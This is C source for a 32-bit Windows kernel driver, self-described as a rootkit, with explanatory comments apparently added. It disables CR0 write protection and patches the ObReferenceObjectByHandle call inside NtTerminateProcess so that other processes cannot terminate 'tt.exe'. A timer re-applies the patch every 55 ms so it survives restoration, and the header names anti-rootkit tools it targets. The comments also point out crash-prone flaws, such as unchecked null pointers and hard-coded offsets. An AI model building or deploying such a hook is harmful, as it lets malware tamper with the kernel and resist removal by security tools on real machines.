InlineHook ----ObReferenceObjectByHandle
///Inline_Hook ObReferenceObjectByHandle
// By Yankai cleveise Auti Micropoint 360safe IceSword ....
#include <ntddk.h>
#define STATUS_WARNING ((NTSTATUS)0x80000000L)
#define PAGEDCODE code_seg("PAGE")
#define LOCKEDCODE code_seg()
#define INITCODE code_seg("INIT")
#define PAGEDDATA data_seg("PAGE")
#define LOCKEDDATA data_seg()
#define ININDATA data_seg("INIT")
// Hand-declared copy of the kernel loader's module-list entry. This structure is
// undocumented and its layout is build-specific -- TODO confirm against the
// kernel build this file targets. Only InLoadOrderLinks, DllBase and
// BaseDllName are read in this file (the module walk in DriverEntry).
typedef struct _LDR_DATA_TABLE_ENTRY{
LIST_ENTRY InLoadOrderLinks;        // followed via Flink in DriverEntry to walk loaded modules
LIST_ENTRY InMemoryOrderLinks;
LIST_ENTRY InInitializationOrderLinks;
PVOID DllBase;                      // taken as the kernel image base once the ntoskrnl.exe entry is found
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STRING FullDllName;
UNICODE_STRING BaseDllName;         // compared (case-insensitively) against L"ntoskrnl.exe"
ULONG Flags;
USHORT LoadCount;
USHORT TlsIndex;
LIST_ENTRY HashLinks;
PVOID SectionPointer;
ULONG CheckSum;
ULONG TimeDataStamp;
PVOID LoadedImports;
PVOID EntryPointActivationContext;
PVOID PatchInformation;
}LDR_DATA_TABLE_ENTRY,*PLDR_DATA_TABLE_ENTRY;
// Hook state shared between DriverEntry, the timer DPC (DPCFUN) and MyUnload.
// Addresses are held in ULONG/LONG and the inline asm uses eax/CR0, so this
// file only makes sense on the 32-bit x86 kernel.
ULONG ObReferenceObjectByHandleAddress;   // resolved in DriverEntry via MmGetSystemRoutineAddress; never read in this file
ULONG NtTerminateProcessAddress;          // kernel base + a hard-coded, build-specific offset (see DriverEntry)
ULONG Recover;                            // original 4-byte call operand saved before patching; written back by MyUnload
PULONG InsertAddress;                     // address of the patched call operand inside the kernel's code; stays NULL if the pattern scan fails
KTIMER timer;                             // one-shot timer re-armed from its own DPC, so the patch is re-applied periodically
KDPC mydpc;                               // DPC object bound to DPCFUN
LARGE_INTEGER largeint;                   // timer due time; set negative in DriverEntry, i.e. a relative interval
LONG RootkitAddress;                      // rel32 displacement from the patched call to RootkitObReferenceObjectByHandle
char* ProtectName="tt.exe";               // image name whose process the hook shields from termination by other processes
// Driver unload: stops the re-patching timer and puts the original call
// operand back into the kernel's code.
// pdriverobj is unused.
VOID MyUnload(PDRIVER_OBJECT pdriverobj)
{
KeCancelTimer(&timer);
// Unconditional write: InsertAddress is still NULL if the pattern scan in
// DriverEntry never matched, and unlike the two other write sites in this
// file (DPCFUN, DriverEntry) the store is not bracketed by the CR0 toggle
// or an IRQL raise.
*InsertAddress=Recover;
}
#pragma LOCKEDCODE
// Timer DPC: re-writes the patched call operand on every timer period so the
// hook survives anything that restores the original bytes, then re-arms the
// timer. DPC routines run at DISPATCH_LEVEL, so no IRQL raise is done here
// (contrast DriverEntry).
// Declared with no parameters and cast to PKDEFERRED_ROUTINE at the
// KeInitializeDpc call in DriverEntry; the real deferred-routine signature
// carries four parameters, and only the cast makes the mismatch compile.
VOID DPCFUN()
{
ULONG xxx;   // saved CR0 value
// Clear CR0.WP (bit 16; mask 0x0FFFEFFFF) so the read-only kernel code page
// becomes writable. cli/sti bracket only the CR0 update itself; the store
// below runs with interrupts enabled.
_asm
{
cli
push eax;
mov eax,CR0;
mov xxx,eax;
and eax,0x0FFFEFFFF;
mov CR0,eax;
pop eax;
sti
};
// Same unguarded dereference as in MyUnload: faults if InsertAddress is
// NULL because DriverEntry's pattern scan did not match.
*InsertAddress=(ULONG)RootkitAddress;
// Restore the saved CR0, re-enabling write protection.
_asm
{
push eax;
mov eax,xxx;
mov CR0,eax;
pop eax;
};
// Re-arm with the relative due time configured in DriverEntry.
KeSetTimer(&timer,largeint,&mydpc);
}
// Replacement for the ObReferenceObjectByHandle call inside the patched
// function (reached through the RootkitObReferenceObjectByHandle trampoline).
// The parameter list mirrors ObReferenceObjectByHandle. No return type is
// declared, so it defaults to int; the value is used as an NTSTATUS.
//
// Behaviour: for process-type handles whose target process is named
// ProtectName, the call fails with STATUS_WARNING unless Handle is the
// current-process pseudo-handle (-1), so only the protected process itself
// can terminate it. Every other case is passed through to the real routine.
MYObReferenceObjectByHandle(
HANDLE Handle,
ACCESS_MASK DesiredAccess,
POBJECT_TYPE ObjectType,
KPROCESSOR_MODE AccessMode,
PVOID *Object,
POBJECT_HANDLE_INFORMATION HandleInformation
)
{
NTSTATUS status;
PEPROCESS Process;
POBJECT_TYPE xx;   // *PsProcessType: the process object type
xx=*PsProcessType;
if (xx==ObjectType)
{
// Look up the process object behind the handle. The reference obtained
// here is never released in this function, and status is not checked
// before Process is dereferenced on the next line.
status=ObReferenceObjectByHandl(Handle,DesiredAccess,ObjectType,AccessMode,&Process,HandleInformation);
// 0x174 is a hard-coded offset into the process object, presumably the
// image-file-name field of one specific kernel build -- TODO confirm.
if (_stricmp((char*)((char*)Process+0x174), ProtectName) == 0)
{
if (Handle==(HANDLE)-1)   // pseudo-handle for the calling process: self-termination is allowed
{
status=ObReferenceObjectByHandle(Handle,DesiredAccess,ObjectType,AccessMode,Object,HandleInformation);
}
else
{
// Any other handle to the protected process is refused. STATUS_WARNING is
// defined above as 0x80000000 (warning severity, not a real error code).
status=STATUS_WARNING;
return status ;
}
}
else
{
// Process handle, but not the protected process: pass through.
status=ObReferenceObjectByHandle(Handle,DesiredAccess,ObjectType,AccessMode,Object,HandleInformation);
}
}
else
{
// Non-process object types are passed through unchanged.
status=ObReferenceObjectByHandle(Handle,DesiredAccess,ObjectType,AccessMode,Object,HandleInformation);
}
return status;
}
// Naked trampoline that the patched call now targets (DriverEntry rewrites
// that call's rel32 operand to point here). No return type is declared
// (implicit int). It builds no frame of its own: the address of
// MYObReferenceObjectByHandle is stored at the bottom of a 0x10-byte scratch
// area, ebp is restored from the slot pushed on entry, and `ret 10h` pops that
// address as the return target while discarding the scratch area. Control
// therefore continues in MYObReferenceObjectByHandle with esp exactly as it
// was on entry -- the original caller's return address and the six call
// arguments still in place -- i.e. a jmp expressed as a ret.
_declspec(naked)RootkitObReferenceObjectByHandle()
{
_asm
{
push ebp;
mov ebp,esp;
sub esp,0x10;
mov ebp,MYObReferenceObjectByHandle;
mov dword ptr [esp],ebp;
mov ebp,dword ptr [esp+10h];
ret 10h;
};
}
// Driver entry. Locates the kernel image base by walking the loader module
// list, adds a hard-coded offset to reach the target function, finds by byte
// pattern the `call` inside it, and rewrites that call's rel32 operand so it
// lands in RootkitObReferenceObjectByHandle. A timer DPC then keeps
// re-applying the same 4-byte write.
//
// Returns STATUS_SUCCESS on every path: the early `return 0` is also 0 ==
// STATUS_SUCCESS, so when the prologue check fails the driver stays loaded
// with InsertAddress NULL and MyUnload will later dereference it.
// pRegistryPath is unused.
//
// Defensive view: the observable artefacts are this driver's own entry in the
// module list it walks, a 4-byte divergence between the kernel's in-memory
// code and its on-disk image at the patched call, and a DPC firing every 55 ms.
NTSTATUS DriverEntry(IN PDRIVER_OBJECT pDriverObject,IN PUNICODE_STRING pRegistryPath)
{
NTSTATUS status=STATUS_SUCCESS;
KIRQL oldirql;
UNICODE_STRING ObReferenceObjectByHandleName;
int i;
// x86 bytes of `push 1 / push dword ptr [ebp+8] / call rel32`: the call whose
// 4-byte operand follows the final 0xE8 and gets patched.
char FindCode[]={0x6A,0x01,0xFF,0x75,0x08,0xE8};
// `mov edi,edi / push ebp`: expected first bytes of the target function; the
// only sanity check applied to the hard-coded offset below.
char CheckCode[]={0x8B,0xFF,0x55};
LONG Offset;
LONG uAttr;   // saved CR0 value
// RVA of the target function for one specific kernel build; no version check
// beyond the 3-byte prologue compare.
ULONG NtTerminateProcessOffset=0x0F1C2A;
char* PointYK;
PULONG DriverAddress;
PULONG DriverSection;
PLIST_ENTRY plistbegin;
PLIST_ENTRY plistend;
PLDR_DATA_TABLE_ENTRY pldr;
UNICODE_STRING DllName;
ULONG ntoskrnladdr;   // NOTE: left uninitialized if the module walk below finds no ntoskrnl.exe entry
UNICODE_STRING filename;
largeint.QuadPart=-550000;   // relative due time: 550000 x 100 ns = 55 ms
RtlInitUnicodeString(&filename,L"ntoskrnl.exe");
RtlInitUnicodeString(&ObReferenceObjectByHandleName,L"ObReferenceObjectByHandle");
// The cast hides that DPCFUN takes no parameters while PKDEFERRED_ROUTINE has four.
KeInitializeDpc(&mydpc,(PKDEFERRED_ROUTINE)DPCFUN,NULL);
KeInitializeTimer(&timer);
pDriverObject->DriverUnload=MyUnload;
// Resolved here but never used afterwards in this file.
ObReferenceObjectByHandleAddress=(ULONG)MmGetSystemRoutineAddress(&ObReferenceObjectByHandleName);
DriverAddress=(ULONG*)pDriverObject;
// 0x014 is a hard-coded offset into the driver object, presumably its
// DriverSection (this driver's own loader entry) -- TODO confirm.
DriverSection=(ULONG*)(*(ULONG*)((char*)DriverAddress+0x014));
plistbegin=plistend=DriverSection;
pldr=(PLDR_DATA_TABLE_ENTRY)plistbegin;
DllName=pldr->BaseDllName;
// Walk InLoadOrderLinks forward from this driver's entry until the entry named
// ntoskrnl.exe is found or the list wraps back to the starting entry.
do
{
pldr=(PLDR_DATA_TABLE_ENTRY)(pldr->InLoadOrderLinks.Flink);
DllName=pldr->BaseDllName;
if (RtlCompareUnicodeString(&DllName, &filename,TRUE) == 0)
{
ntoskrnladdr=(ULONG)(pldr->DllBase);
break;
}
plistend=(PLIST_ENTRY)pldr;
}while(plistbegin!=plistend);
NtTerminateProcessAddress=ntoskrnladdr+NtTerminateProcessOffset;
PointYK=(char*)NtTerminateProcessAddress;
// Bail out (still returning success) if the bytes at the computed address do
// not look like the expected function prologue.
if (!(PointYK[0]==CheckCode[0] && PointYK[1]==CheckCode[1] && PointYK[2]==CheckCode[2]))
{
return 0;
}
// Scan up to 200 bytes past the function start for the 6-byte pattern (the
// compare reads as far as PointYK[204]).
for (i=0;i<200;i++)
{
if (PointYK[i]==FindCode[0] && PointYK[i+1]==FindCode[1] && PointYK[i+2]==FindCode[2] && PointYK[i+3]==FindCode[3] && PointYK[i+4]==FindCode[4] && PointYK[i+5]==FindCode[5])
{
InsertAddress=(PULONG)(PointYK+i+6);          // the call's 4-byte rel32 operand, right after the 0xE8
Recover=(ULONG)*InsertAddress;                // original operand, restored by MyUnload
Offset=(ULONG)InsertAddress+4;                // address of the instruction after the call: the rel32 base
RootkitAddress=(ULONG)RootkitObReferenceObjectByHandle-Offset;   // new displacement
break;
}
}
// If the pattern never matched, InsertAddress is still NULL and the store
// below faults; there is no check.
// Raise to DISPATCH_LEVEL and clear CR0.WP (bit 16) as in DPCFUN; cli/sti
// bracket only the CR0 update, the store itself runs with interrupts enabled.
oldirql=KeRaiseIrqlToDpcLevel();
_asm
{
cli
push eax;
mov eax,CR0;
mov uAttr,eax;
and eax,0x0FFFEFFFF;
mov CR0,eax;
pop eax;
sti
};
*InsertAddress=(ULONG)RootkitAddress;
// Restore CR0 (write protection back on), drop IRQL, start the re-patching timer.
_asm
{
push eax;
mov eax,uAttr;
mov CR0,eax;
pop eax;
};
KeLowerIrql(oldirql);
KeSetTimer(&timer,largeint,&mydpc);
return status;
}